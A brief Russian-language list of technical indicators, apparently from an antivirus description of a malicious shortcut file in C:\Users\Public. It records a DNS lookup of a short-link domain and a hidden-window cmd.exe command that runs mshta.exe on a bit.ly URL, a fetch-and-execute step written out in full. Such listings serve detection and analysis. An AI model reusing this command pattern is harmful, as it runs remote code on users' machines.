Техническая информация
- '%WINDIR%\explorer.exe' C:\Users\Public\ExLink.lnk
- C:\users\public\exlink.lnk
- 'bi#.ly':443
- DNS ASK bi#.ly
- '<SYSTEM32>\cmd.exe' /c start /b mshta.exe https://bit.ly/2SLj5Wn' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /b mshta.exe https://bit.ly/2SLj5Wn
- '<SYSTEM32>\mshta.exe' https://bit.ly/2SLj5Wn